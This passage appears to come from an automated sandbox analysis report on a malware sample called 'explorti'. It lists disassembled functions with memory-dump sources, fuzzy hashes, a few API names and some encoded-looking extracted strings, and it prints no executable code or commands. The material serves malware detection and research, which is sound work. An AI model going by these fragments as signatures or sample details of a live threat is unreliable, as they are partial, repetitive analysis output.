                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction ID: 4581f51ea4c9004f5c50f0b02826d1981ef9a83acdd7517142eac8456b1fb4b4
                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction Fuzzy Hash: 65F12D71E002199FDF14DFA9C8906EEBBB1FF48314F258269E819AB345D731AE45CB90
                        Function 0018CAED Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,0018CE55,?,?,?,?,0018CE8A,?,?,?,?,?,?,0018C400,?,00000001), ref: 0018CB06
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FilePreciseSystem
                        • String ID:
                        • API String ID: 1802150274-0
                        • Opcode ID: 3caa2f514b38e673b121c95936ca73b1bcefc507c0dc8ef2769a0fc2fcc71427
                        • Instruction ID: f4c9e984e808f219fd09da64a9eaea4151728fd62b22f120e0a76dd314b29af3
                        • Opcode Fuzzy Hash: 3caa2f514b38e673b121c95936ca73b1bcefc507c0dc8ef2769a0fc2fcc71427
                        • Instruction Fuzzy Hash: 7DD02232607838A3CB023B84BC008ACBF09EB04B903104023E80513520CB30AD808FE4
                        Function 001A7D63 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction ID: 69dc71435c09c6c984b609cb43215781145d51183e71d975e23281246e0dcd7c
                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction Fuzzy Hash: 6A51597C60C6485ADF3C9A7C8C967FE679A9F53300F1444A9E442D77C2DB119F4983A2
                        Function 00174CD0 Relevance: .7, Instructions: 701COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba4c58f1d72f0c4cd8cb934946f2d8c8ff6bdffa31a21e78bd22fc55e6343882
                        • Instruction ID: 4fa12bd0959c7aadd76da2149f19b7792e09df79ea05a8ee3e3625cdc9ceeb87
                        • Opcode Fuzzy Hash: ba4c58f1d72f0c4cd8cb934946f2d8c8ff6bdffa31a21e78bd22fc55e6343882
                        • Instruction Fuzzy Hash: 7D226FB3F515144BDB4CCA9DDCA27ECB3E3AFD8218B0E803DA40AE3745EA79D9158644
                        Function 001B6EE9 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1b1ebc0421cb8f4f14cb455ab1e38c94a8abe1de628a587a605f4a9c8ec76a6
                        • Instruction ID: bf3efbb6765db60f3bad0dae55db4138d26722f35f2f28c0873420475527739f
                        • Opcode Fuzzy Hash: c1b1ebc0421cb8f4f14cb455ab1e38c94a8abe1de628a587a605f4a9c8ec76a6
                        • Instruction Fuzzy Hash: 5BB147312146099FD719CF2CC496AA57BA0FF85364F298659F89ACF2E1C335E982CB40
                        Function 04B6024B Relevance: .2, Instructions: 185COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 93f0f2e08b6ccfb386c41994406c75c265a789390267f579a2cb9ccce30e23eb
                        • Instruction ID: e6b70f4f181da0dbdc5288e446471d6d1a757abb832742368b0dca496f01cb9f
                        • Opcode Fuzzy Hash: 93f0f2e08b6ccfb386c41994406c75c265a789390267f579a2cb9ccce30e23eb
                        • Instruction Fuzzy Hash: CD3190EB38D111BEB512E15B2B54AB76B3DE6CA73033088B7F807D9446F2DC5A892131
                        Function 00174AD0 Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47e4e7d12d63dffada67bf793e0ce9150ae1f689b5298baa50234b44fc5dbf47
                        • Instruction ID: b32ef1727a62772516ee7db377f0a180d6d3b68ffdc65f2a902cecee095b0d40
                        • Opcode Fuzzy Hash: 47e4e7d12d63dffada67bf793e0ce9150ae1f689b5298baa50234b44fc5dbf47
                        • Instruction Fuzzy Hash: 9E51A2716083918FD319CF2D845563AFFF1BF96200F184A9EE4EA87292D775DA04CBA1
                        Function 001B775B Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 90c22de382f6ac18a71dd3f2c7c7e27d0bc3292ec7772a326c6413aba5b3932e
                        • Instruction ID: 002367268604a16c345cb93c53eeb081fd32847ad5e540b6c5ea774992d088db
                        • Opcode Fuzzy Hash: 90c22de382f6ac18a71dd3f2c7c7e27d0bc3292ec7772a326c6413aba5b3932e
                        • Instruction Fuzzy Hash: D621B673F2043947770CC47E8C572BDB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                        Function 001B763B Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95e712e82453337871e10abb2b5ddeb6481112eef3ff7165ec0e5ad8554c1123
                        • Instruction ID: 670e68921a4ed42291f0b8a2e18126d9bb6a92687bbdab55875af0d30b9abf55
                        • Opcode Fuzzy Hash: 95e712e82453337871e10abb2b5ddeb6481112eef3ff7165ec0e5ad8554c1123
                        • Instruction Fuzzy Hash: 9F118663F30C255B775C817D8C172BAA6D2EBD825071F533AD826E72C4E9A4DE23D290
                        Function 001B8700 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 18a812da4984dadd94945168d907f1eb6b7f51ee3912fd8cb1fe7dd7957ce3f4
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: 6011277B20008283D6088A2EC8F8AF6F79DEBC5B2873D437AD1424B758DF32E945D600
                        Function 001A643B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6057dc69b70bb6fdd0c558f66bd42168b3e4e84433782fb04e3252e64e5f0c7
                        • Instruction ID: 4e4fbc3027d0953897cec4737eee1e6e4ee031a65bd424834f8bf294286b335f
                        • Opcode Fuzzy Hash: d6057dc69b70bb6fdd0c558f66bd42168b3e4e84433782fb04e3252e64e5f0c7
                        • Instruction Fuzzy Hash: 3AE0C238041618AFDF357F14CA18E483BAAEF67345F085800F80856231CB39ED91D680
                        Function 001AA1A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction ID: 29bfd8cdc88d05e786e3c9471c4b7b46149131d0b678302f3d03c11974ee6320
                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction Fuzzy Hash: 00E08C36915228EBCB14DF88C944D9AF3ECEB4AB00F510496B501D3251C370DE00C7D0
                        Function 00182DF0 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 246122658369$Ip==$Krkk$Zww=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range
                        • API String ID: 0-3898363485
                        • Opcode ID: a98c6c989e4a3b644473b8f4e254f3686731d51c444a00842a0c6a4876e2eb4b
                        • Instruction ID: 2ab1a7bce88ed48b27c89724fac7109b564df9937512f9768ae7a47be4163359
                        • Opcode Fuzzy Hash: a98c6c989e4a3b644473b8f4e254f3686731d51c444a00842a0c6a4876e2eb4b
                        • Instruction Fuzzy Hash: 1F020170A00208DFEF15EFA8C849BEEBBB1AF15304F644158E815A72C2D7759B84CFA1
                        Function 001A4750 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON
                        Download Yara Rule
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 001A4787
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 001A478F
                        • _ValidateLocalCookies.LIBCMT ref: 001A4818
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 001A4843
                        • _ValidateLocalCookies.LIBCMT ref: 001A4898
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
